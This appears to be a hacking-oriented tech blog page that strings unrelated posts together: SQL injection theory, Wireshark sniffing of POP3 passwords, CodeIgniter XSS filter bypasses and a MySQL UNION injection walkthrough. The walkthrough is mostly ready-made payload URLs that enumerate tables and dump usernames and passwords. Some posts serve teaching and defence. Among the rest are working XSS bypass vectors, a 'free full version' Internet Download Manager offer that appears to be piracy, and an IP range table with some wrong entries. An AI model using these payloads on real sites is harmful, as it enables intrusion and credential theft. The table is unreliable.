Latest News

SQL Injection


SQL Injection is a type of web application security vulnerability in which an attacker is able to submit a database SQL command which is executed by a web application, exposing the back-end database.

A SQL Injection attack can occur when a web application utilizes user-supplied data without proper validation or encoding as part of a command or query. The specially crafted user data tricks the application into executing unintended commands or changing data. SQL Injection allows an attacker to create, read, update, alter, or delete data stored in the back-end database. In its most common form, a SQL Injection attack gives access to sensitive information such as social security numbers, credit card number or other financial data. SQL Injection is one of the most prevalent types of web application security vulnerability.

Key Concepts of a SQL Injection Attack

SQL injection is a software vulnerability that occurs when data entered by users is sent to the SQL interpreter as a part of an SQL query
Attackers provide specially crafted input data to the SQL interpreter and trick the interpreter to execute unintended commands
Attackers utilize this vulnerability by providing specially crafted input data to the SQL interpreter in such a manner that the interpreter is not able to distinguish between the intended commands and the attacker’s specially crafted data. The interpreter is tricked into executing unintended commands
A SQL Injection attack exploits security vulnerabilities at the database layer. By exploiting the SQL injection flaw, attackers can create, read, modify, or delete sensitive data

Attack Indent

Attacks can also be characterized based on the goal, or intent, of the attacker. Therefore, each of the attack type definitions.
Identifying Injectable Parameters: The attacker wants to probe a Web application to discover which parameters and user-input fields are vulnerable.
Performing Database Finger-printing: The attacker wants to discover the type and version of database that a Web application is using. Certain types of databases respond differently to different queries and attacks, and this information can be used to “fingerprint” the database. Knowing the type and version of the database used by a Web application allows an attacker to craft database specific attacks.
Determining Database Schema: To correctly extract data from a database, the attacker often needs to know database schema information, such as table names, column names, and column data types. Attacks with this intent are created to collect or infer this kind of information.
Extracting Data: These types of attacks employ techniques that will extract data values from the database. Depending on the type of the Web application, this information could be sensitive and highly desirable to the attacker.
Adding or Modifying Data: The goal of these attacks is to add or change information in a database.
Performing Denial of Service: These attacks are performed to shut down the database of a Web application, thus denying service to other users. Attacks involving locking or dropping database tables also fall under this category.
Evading Detection: This category refers to certain attack techniques that are employed to avoid auditing and detection by system protection mechanisms.
Bypassing Authentication: The goal of these types of attacks is to allow the attacker to bypass database and application authentication mechanisms. Bypassing such mechanisms could allow the attacker to assume the rights and privileges associated with another application user.
Executing Remote Commands: These types of attacks attempt to execute arbitrary commands on the database. These commands can be stored procedures or functions available to database users.
Performing Privilege Escalation: These attacks take advantage of implementation errors or logical flaws in the database in order to escalate the privileges of the attacker. As opposed to bypassing authentication attacks, these attacks focus on exploiting the database user privileges.

Preventing SQL Injection Vulnerabilities
  • SQL injection can be prevented if you adopt an input validation technique in which user input is authenticated against a set of defined rules for length, type, and syntax and also against business rules.
  • You should ensure that users with the permission to access the database have the least privileges. Additionally, do not use system administrator accounts like "sa" for Web applications. Also, you should always make sure that a database user is created only for a specific application and this user is not able to access other applications.
  • Another method for preventing SQL injection attacks is to remove all stored procedures that are not in use.
  • Use strongly typed parameterized query APIs with placeholder substitution markers, even when calling stored procedures.
  • Show care when using stored procedures since they are generally safe from injection. However, be careful as they can be injectable (such as via the use of exec() or concatenating arguments within the stored procedure).

Like it ? Share it.

Havij Video TuT

Wireless Attacks Unleashed

As we all know, wireless networks are spread at each and every part of the world, starting from personal home to corporate business environments, schools/universities, cafes, etc. The major merit of wireless networking is to eliminate the big and untidy cables, which acquires space and unspoils the look of your working area. But as we all know, each coin has two sides. There are demerits of wireless networking as well. It comes with high possibility of attacks on it. In this article I am going to describe different techniques of attacks on wireless networks and what we should do to prevent them.

Let’s start with WLAN protocol, which is also known as 802.11 protocol, commonly used for wireless networking. The major function of this protocol is to link more than one device. It uses spread spectrum signals. The functionality of these signals is based on radio frequency communication where networking is established between two point-to-point end devices consisting of a transmitter and a receiver. In this mechanism, participants (in terms of end devices) must have transmitters and receivers to send and receive signals.


To connect to the wireless network, each participant must have wireless AP (Access Point – also known as Wi-Fi hot-spot) along with the wireless adaptor. The AP acts as a walkie-talkie. It converts radio signals into digital signal and vice-versa. When AP transmit the signals, those signals have SSID, known as service set identifier & information of network identification. The receiver detects the signals and lists the available wireless network around him/her, along with the signal strength. Not only this, it also identifies whether the AP is using any security, and if yes, then what is the level of security. As its wireless network, it allows more than one node to let those nodes connect with the network, so that is why authentication is important to ensure there is not any malicious Internet user lying in that network. The AP holds this responsibility.

Add More Options under “Send To” In Windows


You’ve seen the SendTo folder in action any time you right-click a file and select the Send To folder from the context menu. What you might be unaware of is that you can customize the items in this menu. You can add other stuffs under SendTo.

1. First of all make your windows to ‘Show file, folder and drive’. So, we need to go Control Panel then Open Folder Option
(Click on Image for large view)

2. Go to ViewTab and Select ‘Show Hidden Files, Folders and Drives’ then Click OK.

Now come to the main stuff, before starting I want to inform you we can do this stuff in two different way. I will explain you both Method one by one.

¬ Before going to customize have a look in our default SendTO

METHOD: 1

Step 1: Go to Local Disk C → Users → R(This can be different in your PC) → AppData → Roaming → Microsoft → Windows → SendTo
Finally, You will see a window like below image. This is the location of SendTo.

Step 2: In this Window, You need to copy and paste the file, folder or drive whatever you want to add under your system’s SendTo. For example here I added a folder named Geeky Show. You can also do copy paste other application like Winzip, Winrar etc. 

As Result now when we do right click on a file or folder and hovering in SendTo. We can see our folder Geeky Show has been added successfully.

METHOD: 2

Step 1: Open RUNby going to Start menu or by pressing Windows + R
After Opening Run you need to write shell:sendto in the open field then Click OK

Step 2: Soon you will see a window appear in your Desktop like below image. This is the location of SendTo


Step 3: In this Window, You need to copy and paste the file, folder or drive whatever you want to add under your window’s SendTo. For example here I added a folder named Geeky Show. You can also do copy paste other application like Winzip, Winrar etc. 

As Result now when we do right click on a file or folder and hovering in SendTo. We can see our folder Geeky Show has been added successfully.
(Click on image for large view)
Written by Mr. d00z13

Like it ? Share it.

Full Version Internet Download Manager 7.1


Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.

Dear Geekyshows Visitors Enjoy Free Full Version IDM 7.1

Download Link : Internet Download Manager


Like it ? Share it.

IP Address


IP (Internet Protocol) - An IP address is a fascinating product of modern computer technology designed to allow one computer or other digital device to communicate with another via the Internet. IP addresses allow the location of literally billions of digital devices that are connected to the Internet to be pinpointed and differentiated from other devices. 
An IP address consists of four numbers, each of which contains one to three digits, with a single dot '.' separating each number or set of digits. Each of the four numbers can range from 0 to 255. Here's an example of what an IP address might look like: 24.168.0.205. This innocuous-looking group of four numbers is the key that empowers you and me to send and retrieve data over our Internet connections, ensuring that our messages, as well as our requests for data and the data we've requested, will reach their correct Internet destinations. Without this numeric protocol, sending and receiving data over the World Wide Web would be impossible. IP addresses can be either static or dynamic.
Static IP - Static IP addresses never change. They serve as a permanent Internet address and provide a simple and reliable way for remote computers to contact you. Static IP addresses reveal such information as the continent, country, region, and city in which a computer is located; the ISP (Internet Service Provider) that services that particular computer; and such technical information as the precise latitude and longitude of the country, as well as the locale, of the computer. Static IP addresses are generally preferable for such uses as VOIP (Voice over Internet Protocol), online gaming, or any other purpose where users need to make it easy for other computers to locate and connect to them. Static IP addresses are considered somewhat less secure than dynamic IP addresses, since they are easier to track for data mining purposes. 
Dynamic IP - Dynamic IP addresses are temporary and are assigned each time a computer accesses the Internet. They are, in effect, borrowed from a pool of IP addresses that are shared among various computers.
                 
Some Special IP Address :

Address Block                                                           Present Use
0.0.0.0/8                                                          “This” Network
10.0.0.0/8                                                        Private-Use Networks
14.0.0.0/8                                                        Public-Data Networks
24.0.0.0/8                                                        Cable Television Networks
39.0.0.0/8                                                        Reserved, Subject to Allocation
127.0.0.0/8                                                      Loopback
128.0.0.0/16                                                    Reserved, Subject to Allocation
169.254.0.0/16                                                Link Local
172.161.0.0/12                                                Private-Use Networks
191.255.0.0/16                                                Reserved, Subject to Allocation
192.0.0.0/24                                                    Reserved, Subject to Allocation
192.0.2.0/24                                                    Test-Net
192.88.99.0/24                                                6to4 Relay Any cast
192.168.0.0/16                                                Private-Use Networks
198.18.0.0/15                                                  Network Interconnect Device Benchmark Testing
223.255.255.0/24                                            Reserved, Subject to Allocation
240.0.0.0/4                                                      Reserved for Future Use
224.0.0.0/4                                                      Multicast, Commonly used in Multiplayer Simulations and                                                                                             Gaming and for Video distribution.

Like it ? Share it.

How To Capture Passwords Across The Air - Network Traffic Analysis



ABSTRACT

     It is known that WireShark is a powerful tool that goes far beyond a simple sniffer. What many do not know is that there are several ways to harness the potential of this tool and this is what this article aims at introducing the readers. We will learn to sniff the network effectively, create filters to find only the information we want, see it as a black hat would use this tool to steal passwords, and finally how to use WireShark to diagnose network problems or if a firewall is blocking packets correctly.

INTRODUCTION

     Today it is very unlikely that your password will be brute forced. You use the internet regularly and one day you're surprised to receive allegations of an intrusion. Evidence indicates that the intruders third party accounts departed from your account, and you have no idea what is happening. Someone may have made use of your account and performed such acts as you. How could this have happened? A strong possibility is that you have become the victim of an attack via "sniffer".

UNDERSTAND THE MAIN CONCEPT

     What are "sniffers"? The main purpose of a sniffer is to capture network traffic. They are used for network analysis purposes, however they can also be used by malicious hackers to capture your passwords, and even IDS systems are based on network sniffers.

     These programs also allow you to monitor network activity recording data (usernames, passwords; ect.) each time they access other computers on the network.

     These programs aim at monitoring ("sniffing") network traffic to capture access to network services, such as remote mail service (IMAP, POP3), remote access (telnet, rlogin, etc.), file transfer (FTP) etc.. accesses made, capturing packets. Always aimed at getting the most relevant information.
When we called the HUB computer and send information from one computer to another, in reality this data is for all ports of the HUB, and therefore for all machines. It turns out that only the machine on which the information was intended to send the operating system.

     If a sniffer were running on other computers, even without these systems sending data it travels there for the operating system, the sniffer will intercept at the network layer, capturing the data and displaying them to the user, in an unfriendly way. Generally the data is organized by type of protocol (TCP, UDP, FTP, ICMP, etc...) and each package read may have show your content.


YOUR PASSWORD CAN BE CAPTURED BY SNIFFERS!

     Many local area networks (LANs) are configured sharing the same Ethernet segment. Virtually any computer of the network can run a "sniffer" program to "steal" users passwords. "Sniffers" work monitoring the flow of communication between computers on the network to find out when someone uses the network services previously mentioned. Each of these services uses a protocol that defines how a session is established, such as your account is identified and authenticated and how to use the service.
     To have access to these services, you first have to have a "log in". The login sequence - is part of the authentication protocol, which occurs at the beginning of each session - the "sniffers" are concerned about this, because it is this part that is your password. Therefore, it is only the filter "strings" keys that the password is obtained.


STEP BY STEP

     Currently, almost all environments use switches and not hubs, which makes sniffing a little more difficult because the switches do not send the data to all ports as a hub does, it sends directly to the port where the host destination is. So if you try to sniff a network switch you will only hear what is broadcast, or its own connection. To be able to hear everything without being the gateway of the network, an ARP spoof attack (aka ARP poisoning) is necessary, or burst the CAM table of the switch.

Basic Usage
     Now let's get our hands dirty: I'm assuming you already have the program (WireShark) installed, if you do not then download it. When starting WireShark, the displayed screen will look something like Figure 1:


Figure 1) Wireshark.

     Before you can start capturing packets, we have to define which interface will "listen" to the traffic. Click Capture > Interfaces


Figure 2) Interfaces.

     From there, a new window will appear with the list of automatically detected interfaces, simply select the desired interface by clicking the box next to the name of the interface, as in figure 3:


Figure 3) Capture Interfaces.

     If you click Start, it will begin automatically capturing packets. You can select the interface and only then it will start the capture if necessary.
     When the capture process starts, you will see several packets traversing the screen WireShark (varying according to the traffic of your machine / network). Will look something like the figure 4:


Figure 4) Capturing.

     To stop the capture, simply click the button, "Stop the running live capture".


Figure 5) Stop.

     It is important to remember that you must take care if your network is busy, the data stream may even lock your machine, then it is not advisable to leave the WireShark to capture for a long time, as we will see, we will leave it running only during the process to debug a connection. The greater the amount of packets, the longer it takes to apply a filter, find a package, etc.

     With this we have the basics of the program, we can set the capture interface, start and stop the capture. The next step is to identify what interests among many packages. For this, we will start using filters.

Using Filters

     There are a plethora of possible filters, but at this moment we will see just how to filter by IP address, port and protocol.
The filters can be constructed by clicking on "Filter", then selecting the desired filter (there is a short list of pre-defined filters), or by typing directly into the text box. After you create your filter, just click "Apply", if you wanted to see the entire list of packages again just click "Clear", this will remove the filter previously applied.


Figure 6) Filter.


     I will use a small filter list as an example:


Figure 7) Example by Rafael Souza (RHA Infosec).


     It is also possible to group the filters, for example:
ip.src == 10.10.10.1 && tcp.dstport==80 OR ip.src == 10.10.10.1 and tcp.dstport==80

Source address 10.10.10.1 
And destination port 80


CAPTURING PASSWORDS

     Now we will see how you can capture passwords easily, just by listening to traffic. For this example we will use the POP3 protocol, which sends the data in clear text over the network. To do this, start capturing packets normally and start a session with your POP3 email server. If you use a safer protocol like IMPAPS or POP3 and I just wanted to see the functioning of the mechanism, it is possible to connect via telnet to POP3 without having to add / modify your account, simply run the following:

telnet serveremail.com 110
user user@rhainfosec.com
pass rhainfosecpasswd

     Now stop the capture, filter and put "pop" and then click "Apply". now thats done, you see only the packets of POP3 connection. Now click on any of them right, and then click "Follow TCP Stream".


Figure POP3.
     With this we will open a new window with the entire contents of the ASCII connection. As the POP3 protocol sends everything in plain text, you can see all the commands executed, including the password.


Figure 9) Pass.

     This can be transported to any connection in plain text, such as FTP, Telnet, HTTP, etc.. Just to let you change the filter and examine the contents of the connection.

Importing External Captures

     Usually in servers, there is no graphical environment installed and with that you cannot use WireShark directly. If you want to analyze traffic on this server and you cannot install WireShark, so you have to capture this traffic elsewhere, the best one can do is write traffic with TCPdump locally and then copy this dump to a machine with WireShark from where a more detailed analysis is made.

     We will capture everything that comes and goes from the host 10.10.10.1 with destination port 80 and save content in capturerafaelsouzarhainfosec.pcap file from the local folder where the command was executed. Run the server:

tcpdump -i eth0 host 10.10.10.1 and dst 
port 80 -w 
capturerafaelsouzarhainfosec.pcap

     Once you're finished capturing, simply use CTRL + C to copy the file to the machine WireShark capture and import by clicking on File -> Import. Once imported, you can use the program normally as if the capture had occurred locally.


EVOLUTION OF THINKING

Why steal your password?

     There are various reasons that lead people to steal passwords from simply to annoy someone (sending email as you) up to perform illegal activities (invasion on other computers, theft of information, etc.) An attraction to crackers is the ability to use the identity of others in these activities.

     One of the main reasons that attackers try to break systems and install "sniffers" is the ability to quickly capture the maximum number accounts. Thus, the more accounts this attacker has , the easier it is to hide your stash.

How can you protect yourself?

     Do not think that "sniffers" can make all the whole internet insecure. It is not so. You need to be aware of where the risk is , when you're at risk and what to do to be safe .

     When you have your credit card stolen or suspect that someone may be using it improperly, you cancel the card. Likewise, as passwords can be stolen, it's critical that you replace it regularly. This precaution limites the amount of time that a stolen password can be used by an attacker.

     Never share your password with others. This sharing makes it difficult to know where your password is being used (exposed) and is harder to detect unauthorized use. A password is like a tooth brush never share it and change it regularly.

     Never give your password to anyone that is claiming they need access to fix your account problem or wanting to investigate the breach of a system. This trick is one of the most effective methods of hacking, known as "social engineering."

Use networks you can trust

     Another aspect you should take into consideration is what network you can trust and which you cannot. If you are traveling and need to access an organizations computer remotely have a great level of assurance that the network is secure. For example, pick any file in your home directory that you share is it available to a "LanHouse" or network of another organization . Are you sure you can trust the network?

     If you have no alternative for secure remote access and only have available resources such as telnet, for example, you can "mitigate" this effect by changing the password at the end of each session. Remember that only the first packet (200-300 bytes)of each session carry information from your "login". Therefore, to always change your password before logging out, this will not be captured and password before it that were exposed to the network are no longer valid. Of course it is possible to capture everything going across the network, but the attacker has no intention of filling their file system quickly and becoming so easily discovered.

Why are networks so vulnerable to "sniffers"?

     There are several reasons and there is no quick solution to the problem.

     Part of the problem is that companies tend to invest in more new features rather than add security. New security features can create the most difficult systems to configure and less convenient to use. Remember companies try to adhere to the C.I.A. triangle (confidentiality, integrity, and availability). New features create unintended effects on availability when this happens policy is overlooked creating a new vulnerability in itself.

     Another part of the problem is related to added costs for Ethernet switches, hubs, network interfaces that do not support the particular "promiscuous" that sniffers can use.


CONCLUSION

     The question that remains is how can we protect ourselves from this threat...


i) Network cards that cannot be put into "promiscuous" mode. Thus, computers cannot be mastered and transformed into "sniffers".

ii) Typically, the Ethernet interface only passes packets to the highest level protocol that are intended for local machine. Switching this interface into promiscuous mode allows all packets that are accepted and passed to the higher layer of the protocol stack. This allows the selection you want.

iii) Packages that encrypt data in transit over the network, thus avoiding to flow passwords "in the clear".

     I would remind you that the safest thing to adopt and encourage the use of is software which enables remote access encrypted sessions, they help to make your environment much more secure.

     One fairly common encryption technology currently in secure communication between remote machines SSH (Secure Shell). SSH is available for different platforms. Its use does not prevent the password captured, but as this is not an encrypted service to the attacker. SSH negotiates connections using RSA algorithm. Once the service is authenticated, all subsequent traffic is encrypted using IDEA technology. This type of encryption is very strong.

     In the future, security will be increasingly intrinsic to the systems and infrastructure networks. No use having all the "apparatus" of security if you need, but do not use them. Security is not something that can be completely secure. Remember, no one is 100% secure.

Thank you readers, it's always good to help my dear friend Rafay Baloch

ABOUT THE AUTHOR:

This is a guest post written by , RAFAEL FONTES SOUZA. He is the maintainer of the “Project Backtrack Team Brazilian”, He works at RHAinfosec as a senior penetration tester. He is also the Founder of the "Wikileaks and Intelligence, Cypherpunks". Good communication in groups and the general public, attended college projects with a focus on business organization, he currently seeks work experience outside of brazil”. He frequently contributes at RHA and talks about various topics related to internet security. 

Code Igniter XSS Filter Multiple Bypasses


Recently we released our "XSS Filter Evasion Cheat Sheet", i was quite surprised to hear the community feedback. The total downloads have surpassed a figure of 2500, which was quite amazing considering that i didn't expect it to escalate that quickly.  Recently, i had a chance to test Code Igniter's XSS clean function, as it relied upon blacklist it caught my interest. I was pleased that almost all the payloads/techniques that were used to bypass the "XSSCLEAN" function have been already documented inside our "XSS Filter Evasion Cheat Sheet".

Vulnerability Details

The test-bed i used was setup by @soaj1664ashar based upon the rules of the "XSS Clean" function inside of code igniter.

http://xssplayground.net23.net/clean11.html

I managed to find lots of bypasses, however couple of them collided with what @soaj1664ashar had already found before. Therefore, i thought to publish the ones that did not collide with his vectors.

Bypass 1 - Null Bytes

Internet explorer up to version 9, ignores null bytes every where. The XSSClean function was filtering for keywords like <script>, however it was not filtering out the null bytes. Therefore under Internet explorer 9 and below, the following is a valid vector executing javascript perfectly.

<scr\x00ipt>confirm(1);</scr\x00ipt>

Bypass 2 - SVG and XLINK

The XSSCLEAN function was not filtering out the SVG tag and the xlink attribute. Along with it the XSSCLEAN function was also filtering out keywords such as javascript, vbscript etc. However this doesn't prevents us from executing javascript.

protected function _js_link_removal($match)
{
//echo "in link removal";
return str_replace($match[1],
preg_replace('#href=.*?(?:alert\(|alert&\#40;|javascript:|livescript:|mocha:|charset=|window\.|document\.|\.cookie|<script|<xss|data\s*:)#si',
'',
$this->_filter_attributes(str_replace(array('<', '>'), '', $match[1]))
),
$match[0]);

}

The following payload manages to pass through the XSSCLEAN function of Codeigniter and yields a valid javascript:

<svg xmlns:xlink=http://www.w3.org/1999/xlink><a><circle r=100 /><animate attributeName=xlink:href values=;javas&Tab;cript&colon;confirm&lpar;1&rpar; />

Bypass 3 - HREF


Since, we were able bypass the blacklist that was looking for the keyword "javascript", we can use the href tag to execute valid javascript.

<a/href=javas&Tab;cript&colon;confirm(top.location)>XSS

There are countless other variations thought.

Bypass 4 - Separators

There are certain characters that get's parsed as whitespace characters, since the "Code Igniter" was not filtering out the space characters, they can be used to yield a valid javascript syntax inside various browsers. For more information on them, please refer to our "XSS Filter Evasion Cheat Sheet".

More Bypasses

Ashar javed found various bypasses for CodeIgniter, if you are interested in more bypasses, please refer the link below:

https://github.com/EllisLab/CodeIgniter/issues/2667

Everything About Linux Iptables/Linux Firewall

Introduction
Firewalls are used to monitor and control the inbound and outbound traffic on the protected network. They have an ability to block and allow the internal as well as external services within the network. Before allowing access to the service, a firewall may also force the client / user to pass through an authentication. Sometimes a firewall can be also used in IPSEC tunnels as a platform. It monitors security-related events.

Packet Filtering
The packet filtering mechanism mainly contains inspection on TCP/IP and UDP packets. It also includes all ports in its inspection. In this process, certain rules are written for allowing and rejecting the packets passing through the network. The rules written in the firewall may contain TCP and UDP port numbers, source and destination addresses. One can implement firewall rules which may work in both inbound and outbound directions.

Types of Firewalls
There are basically four types of firewalls:
  1. Packet Filter Firewall
  2. Stateful Packet Filter Firewall
  3. Circuit Level Gateway
  4. Application Level Gateway
Packet Filter Firewall
This firewall comes into play when an administrator wants only certain packets to enter into the protected network. In this case, each packet will be monitored and inspected before passing through the network, and after monitoring and inspecting, the firewall will decide whether to let it pass or not.



There are two types of packet filter mechanisms:
  1. Stateful Packet Filtering
    These types of firewalls are known as a smart / clever firewall. If the firewall remembers the packets it allowed and blocked in the network, then it is known as Stateful packet filtering. Sometimes it is also called a dynamic packet process.
  2. Stateless Packet Filtering
    In this case, information about all those previous packets passed through the networks is not being remembered by a firewall. This type of firewall can be bypassed and easily fooled by attackers, and is especially dangerous for UDP data packets. This firewall will never come to know whether the given packet is a part of existing connection or any rough useless packet, because it isolates each and every packet.
  3. Stateful Filter Firewall
    I have already mentioned about the Stateful packet filtering process in the above section. Additionally, this type of firewall keeps a track record of TCP streams to inspect each and every packet passing through and in and out of the network. Generally this type of firewall is only constructed to inspect packets which are coming in only one direction, from client to server. There is an automatic process which handles counter requests (replies) going from server to client. It has an ability to support a wider range of protocols such as IRC, FTP, etc…


    TO READ FULL ARTICLE ALONG WITH PRACTICAL IMPLEMENTATION OF FIREWALL, CLICK ON BELOW LINK TO VIEW


Bypassing Modern WAF's XSS Filters - Cheat Sheet



Last month i was asked by my university teacher "Sir Asim Ali" to write a paper on any topic related to "Computer Architecture" as a semester project. I was particularly interested in writing security related stuff, let it be related to computer architecture, networks etc. However i found that lots of work has already been done on the architecture level security. Therefore, i convinced my teacher that i'll be writing on "Bypassing Modern Web Application Firewall's" as some of you might know that most of my research is related to client side vulnerabilities and bypassing WAF's.


In my day to day job as a penetration tester, it's very often that i encounter a web application firewall/filter that looks for malicious traffic inside the http request and filters it out, some of them are easy to break and some of them are very hard. However, in one or another context all the WAF's i have encountered are bypassable at some point.

Rsnake's XSS cheat sheet was one of the best resources available for bypassing WAF's, however overtime as browsers got updated lots of the vectors didn't work on the newer browser. Therefore there was a need to create a new Cheat Sheet. Over time i have developed my own methodology for bypassing WAF's and that's what i have written the paper on. The paper talks specifically about bypassing XSS filters, as for SQLi, RCE etc. I thought to write a different paper as the techniques differ in many cases.

  Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters




Fortune in kali linux

When fortune is run with no arguments it prints out a random epigram. Epigrams are divided into several categories, where each category is sub-divided into those which are potentially offensive and those which are not.


1. How to install Fortune – Open Terminal, type apt-get install fortune and Press Enter.
(Click on image for large view)

2. Fortune – Print a random, hopefully interesting, adage.
Syntax - /usr/games/fortune

3. If you logged in as an user (not root) then command syntax will be change.
Ex : hell@MrQuiety:/root$ fortune
(Click on image for large view)

Like it ? Share it.

Understanding This Technique Called MySQL Injection

ABSTRACT

It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity.
Did you know that numerous inventions and discoveries are due to misconceptions?
There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pros software's for analysis and farredura vulnerabilities were unimproved by us.

Understand the technique MySQL Injection

One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application.

STEP BY STEP


Figure 1) Detecting.


Searching Column number (s): We will test earlier in error, then no error may be said to find.


Figure 2) SQL error.

Host Information,
Version of MySQL system used on the server.


Figure 3) Host Information.



Figure 4) Location of the files

Current database connection used between the "input" to the MySQL system.


Figure 5) Users of MySQL.


Figure 6) Current Time.

Brute Force or Shooting

This happens in versions below 5.x.y


Figure 7) Testing.

Dump
This happens in versions up 5.x.y [ 1º Method ] 

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--

usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ] 

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
ou
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--
COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--
usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--
rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Searching Column (s) of a given table
* Brute Force / Shooting
This happens in versions below 5.x.y
http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--
_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--
rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1

=--------------------------=--------------------------=--------------------------=--------------------------=
Dump
This happens in versions up 5.x.y [ 1º Method ] 
"usuarios" hexadecimal -> "7573756172696f73"

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ] 

"usuarios" decimal -> "117,115,117,97,114,105,111,115"

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where
table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where
table_name=char(117,115,117,97,114,105,111,115) limit 1,2--
passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where
table_name=char(117,115,117,97,114,105,111,115) limit 2,3--
id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where
table_name=char(117,115,117,97,114,105,111,115) limit 3,4--
text
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Extracting data from the columns of a given table
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select
1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--
_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337‘ in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_RHA_ : infosec1337’ at line 1

=--------------------------=
Concat 
group_concat() => Search all you want with ascii caracters
concat() => search what you want with ascii caracters
concat_ws() => unite
Hexadecimal 
0x3a => :
0x20 => space
0x2d => -
